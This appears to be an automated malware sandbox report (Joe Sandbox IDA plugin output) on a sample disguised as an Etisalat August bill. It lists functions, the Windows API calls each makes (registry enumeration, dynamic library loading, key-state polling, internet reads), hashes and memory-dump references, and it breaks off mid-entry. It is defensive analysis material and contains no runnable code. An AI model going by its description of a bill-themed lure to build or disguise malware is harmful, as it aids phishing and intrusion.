Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 57e99490e2c4135e8a74d287cd1d50859a69551a01e70647109547719e37ec47
Instruction ID: 3daba803b0b04f003c49fd525b7e0c15dae1430c8ac7d77890551a4a35ebfb8c
Opcode Fuzzy Hash: 57e99490e2c4135e8a74d287cd1d50859a69551a01e70647109547719e37ec47
Instruction Fuzzy Hash: C651D772914209EFCB14EF6D9C819AEB7B8FF40360B11436BE464D73A1EB709E40AB51

Function 0090E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0090DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0090CF22,?), ref: 0090DDFD

Part of subcall function 0090DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0090CF22,?), ref: 0090DE16

Part of subcall function 0090E199: GetFileAttributesW.KERNEL32(?,0090CF95), ref: 0090E19A

lstrcmpiW.KERNEL32(?,?), ref: 0090E473
MoveFileW.KERNEL32(?,?), ref: 0090E4AC
_wcslen.LIBCMT ref: 0090E5EB
_wcslen.LIBCMT ref: 0090E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0090E650

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 0aa9fb1272a0921b64fd5026687cabbb57ad4e71a689faec5c1e81d860c26519
Instruction ID: 31a06ba8f535a3c561461550a167be04384ee96591b48005fedebdbbfa0eabe3
Opcode Fuzzy Hash: 0aa9fb1272a0921b64fd5026687cabbb57ad4e71a689faec5c1e81d860c26519
Instruction Fuzzy Hash: C8515FB24087459FD724EB94D881ADBB3ECEF85340F00492EF589D3191EE75E6888B66

Function 0092B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

Part of subcall function 0092C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0092B6AE,?,?), ref: 0092C9B5
Part of subcall function 0092C998: _wcslen.LIBCMT ref: 0092C9F1
Part of subcall function 0092C998: _wcslen.LIBCMT ref: 0092CA68
Part of subcall function 0092C998: _wcslen.LIBCMT ref: 0092CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0092BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0092BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0092BB63
RegCloseKey.ADVAPI32(?,?), ref: 0092BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0092BBB3

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: d868eec67ec51d51f1439b76c9ed5b23fad338c4e553f28f1c815fb169576008
Instruction ID: 0e49a3186391af7a0a0debd50d81ae201614786cae2e49a28fc35c11182a0cf5
Opcode Fuzzy Hash: d868eec67ec51d51f1439b76c9ed5b23fad338c4e553f28f1c815fb169576008
Instruction Fuzzy Hash: F561C271208241EFD714DF14D490E2ABBE9FF85308F14896CF4998B2A2DB31ED45CB92

Function 00908BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00908BCD
VariantClear.OLEAUT32 ref: 00908C3E
VariantClear.OLEAUT32 ref: 00908C9D
VariantClear.OLEAUT32(?), ref: 00908D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00908D3B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: af0c27b9c972ea647d54a8558991288101f443775590f30185df2cf839eec069
Instruction ID: 05b4721c853361c6eb486c5b8f0b8e63a1ce9ec5883a8d90b817dacbdc050ce8
Opcode Fuzzy Hash: af0c27b9c972ea647d54a8558991288101f443775590f30185df2cf839eec069
Instruction Fuzzy Hash: 77517CB5A10619EFCB10CF68C884AAAB7F9FF89310B158559F945DB390E730E911CF90

Function 00918AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00918BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00918BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00918C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00918C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00918C5F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: bc0d6a7eaeef8e94d38b9ff5bf97aaa7be2deba1216d80af576548334dceba60
Instruction ID: 276487dbee38c681812c5e57802a5b530f0057cefa242c01a91988e4bcd19115
Opcode Fuzzy Hash: bc0d6a7eaeef8e94d38b9ff5bf97aaa7be2deba1216d80af576548334dceba60
Instruction Fuzzy Hash: 3F515B35A006189FDB00DF68C881AAEBBF5FF49314F088458E849AB362CB35ED51DF91

Function 00928EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00928F40
GetProcAddress.KERNEL32(00000000,?), ref: 00928FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00928FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00929032
FreeLibrary.KERNEL32(00000000), ref: 00929052

Part of subcall function 008BF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00911043,?,7529E610), ref: 008BF6E6
Part of subcall function 008BF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,008FFA64,00000000,00000000,?,?,00911043,?,7529E610,?,008FFA64), ref: 008BF70D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: ab3ac587ab8e7533759321eb7d300f3ed881512eaa3e69ced2561025fa0079dc
Instruction ID: ffe29bd329b9c865c70c0b280e8912ebc9687dfc3f695408b77fec0ee0d770f2
Opcode Fuzzy Hash: ab3ac587ab8e7533759321eb7d300f3ed881512eaa3e69ced2561025fa0079dc
Instruction Fuzzy Hash: D9514934A05215DFD700DF58C4948AEBBF5FF49314F0880A8E80AAB762DB31ED86CB91

Function 00936B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00936C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00936C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00936C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0091AB79,00000000,00000000), ref: 00936C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00936CC7

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: ce6178c59ee9d3b6aa0d3e32240435f02d2fd806ff6cf9fe42ba4434b177c0e8
Instruction ID: 4214c965cf6208e5ef4080dfb7b33720ee9295f443b8f725616dbd42a416fb12
Opcode Fuzzy Hash: ce6178c59ee9d3b6aa0d3e32240435f02d2fd806ff6cf9fe42ba4434b177c0e8
Instruction Fuzzy Hash: 9441C775A08104BFDB24CF28CC55FA5BBA9EB09350F159268FAD9A72E0C371ED41DE50

Function 008D2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008D20C3
_free.LIBCMT ref: 008D20E3

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: df3323efc7cda82bf375093ef77452cefc0c89f50929bfc0ac3b4dad1e1aacbd
Instruction ID: ae2da2fbd4f71bbbbe59a4ca48aecf3a7f313f622e24b814e276c6b7c3571ffc
Opcode Fuzzy Hash: df3323efc7cda82bf375093ef77452cefc0c89f50929bfc0ac3b4dad1e1aacbd
Instruction Fuzzy Hash: C441D672A00204AFCB24DF78C881A6DB7B5FF99314F1546A9E615EB351D631ED01DB81

Function 008B912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 008B9141
ScreenToClient.USER32(00000000,?), ref: 008B915E
GetAsyncKeyState.USER32(00000001), ref: 008B9183
GetAsyncKeyState.USER32(00000002), ref: 008B919D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: d13a4a808a5a3408c2fcab879fb2235d5dd1f56ef4317ded42def5f422839864
Instruction ID: 41c1fbd5360483edd79a08d2725a4bafbb923d688535278cf7dd4c7ad6ff3bae
Opcode Fuzzy Hash: d13a4a808a5a3408c2fcab879fb2235d5dd1f56ef4317ded42def5f422839864
Instruction Fuzzy Hash: 6B41AE71A0860AFBDF159F68C844BFEB774FF05324F208219E565E6290C7346994DF91

Function 00913874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 009138CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00913922
TranslateMessage.USER32(?), ref: 0091394B
DispatchMessageW.USER32(?), ref: 00913955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00913966

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 9915ad801767bd9938fa114692e05d9f130e8319add8d75bbb645259469a7664
Instruction ID: f187232c96ed66111174191ad54e3e7de881e9f733440bb0384724d3695a3181
Opcode Fuzzy Hash: 9915ad801767bd9938fa114692e05d9f130e8319add8d75bbb645259469a7664
Instruction Fuzzy Hash: 9D31D771718349DFEB39CB399849FF63BBCEB05300F048569E466921A0E3B4AAC5DB11

Function 0091CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0091CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0091CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0091C21E,00000000), ref: 0091CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0091C21E,00000000), ref: 0091CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0091C21E,00000000), ref: 0091CFF2

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: baa0696ac5def8ffd5fe21a3337894c7daaf147dd1c1a055243f3ad4a34aff59
Instruction ID: 32e0a28c57af78f569d608bc2289204b4edbd4588148abb2f13455d8d223c8ea
Opcode Fuzzy Hash: baa0696ac5def8ffd5fe21a3337894c7daaf147dd1c1a055243f3ad4a34aff59
Instruction Fuzzy Hash: 52314FB1644609AFDB20DFA5C884AEBBBFDEB14351B10442EF516E2251D730ED86DB60

Function 00901901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00901915
PostMessageW.USER32(00000001,00000201,00000001), ref: 009019C1
Sleep.KERNEL32(00000000,?,?,?), ref: 009019C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 009019DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 009019E2

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: e0ba3c33a4679f4e16532ad222eed2f6577f9441a40770f8440866522f1a99b3
Instruction ID: d70fb4b4fa6fb39d5f7f098c8fe09eb838668d4974a4ef5d6ffb3bacd39b222e
Opcode Fuzzy Hash: e0ba3c33a4679f4e16532ad222eed2f6577f9441a40770f8440866522f1a99b3
Instruction Fuzzy Hash: 9D31D172A00219EFCB00CFA8DD99ADE3BB5EB45315F104229F931A72D1C7709D44DB90

Function 00935706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00935745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0093579D
_wcslen.LIBCMT ref: 009357AF
_wcslen.LIBCMT ref: 009357BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00935816

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 52c71ad7541b4e1fa5489207900159fbfad433e0533531d2099f0f4a62e37e2c
Instruction ID: a61686e8538dd3ca20ff28258ceddeefdb7c8094bcfbc74e3b03bb95be689522
Opcode Fuzzy Hash: 52c71ad7541b4e1fa5489207900159fbfad433e0533531d2099f0f4a62e37e2c
Instruction Fuzzy Hash: E221D2719046189BDB209FA4CC89AEE7BBDFF08324F108216E929EA190D7708A85CF51

Function 00920930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00920951
GetForegroundWindow.USER32 ref: 00920968
GetDC.USER32(00000000), ref: 009209A4
GetPixel.GDI32(00000000,?,00000003), ref: 009209B0
ReleaseDC.USER32(00000000,00000003), ref: 009209E8

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: bedd4360ab7aec1f1b73775ceb0201d1c7552b898d0c7e7f7277bd910cbe8b42
Instruction ID: 53c7e3360dc8b6cea30d2cfefd7e1fccc8bd90cc760f0b29c783398fc2f1e867
Opcode Fuzzy Hash: bedd4360ab7aec1f1b73775ceb0201d1c7552b898d0c7e7f7277bd910cbe8b42
Instruction Fuzzy Hash: 83216F75A00614AFD704EF69D885AAEBBE9EF85740F048468E84AE7762CB70AC44DF50

Function 008DCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 008DCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008DCDE9

Part of subcall function 008D3820: RtlAllocateHeap.NTDLL(00000000,?,00971444,?,008BFDF5,?,?,008AA976,00000010,00971440,008A13FC,?,008A13C6,?,008A1129), ref: 008D3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008DCE0F
_free.LIBCMT ref: 008DCE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008DCE31

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: b8c2b9799908d7e76df77227b5ea90526de527145ede7178730b1b2c860bd538
Instruction ID: 31a465e0de5cd190fb57e8e9b1b790a14ef3d12bea555ab3be048cbc21a6a544
Opcode Fuzzy Hash: b8c2b9799908d7e76df77227b5ea90526de527145ede7178730b1b2c860bd538
Instruction Fuzzy Hash: F101D8F26056167F232116BAAC48D7BBB6DFEC6BA1315032BF905D7300DB608D01E6B1

Function 008B9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008B9693
SelectObject.GDI32(?,00000000), ref: 008B96A2
BeginPath.GDI32(?), ref: 008B96B9
SelectObject.GDI32(?,00000000), ref: 008B96E2

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 836418272c9f21caf40007e0b56a2e3800ae82b4f8d71b900954da8a57c673a9
Instruction ID: 6fba6e1375b124e15aa1354815571f11118b16d09c9252a8677151d66b8b6bd7
Opcode Fuzzy Hash: 836418272c9f21caf40007e0b56a2e3800ae82b4f8d71b900954da8a57c673a9
Instruction Fuzzy Hash: 4221B372829309EBDB108F6CEC047E97BB4FB61355F100216F654E62B0D3705886EF90

Function 008B990F Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 008B98CC
SetTextColor.GDI32(?,?), ref: 008B98D6
SetBkMode.GDI32(?,00000001), ref: 008B98E9
GetStockObject.GDI32(00000005), ref: 008B98F1
GetWindowLongW.USER32(?,000000EB), ref: 008B9952

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID:
API String ID: 1860813098-0
Opcode ID: 162ba42c083d00564e27180124c1a4c539a85e694e23811dd2e87ec26b9543e7
Instruction ID: 74762c2b8313bd11a258293a60c24563c02dc3db5c4ce822964935c04dcd51a4
Opcode Fuzzy Hash: 162ba42c083d00564e27180124c1a4c539a85e694e23811dd2e87ec26b9543e7
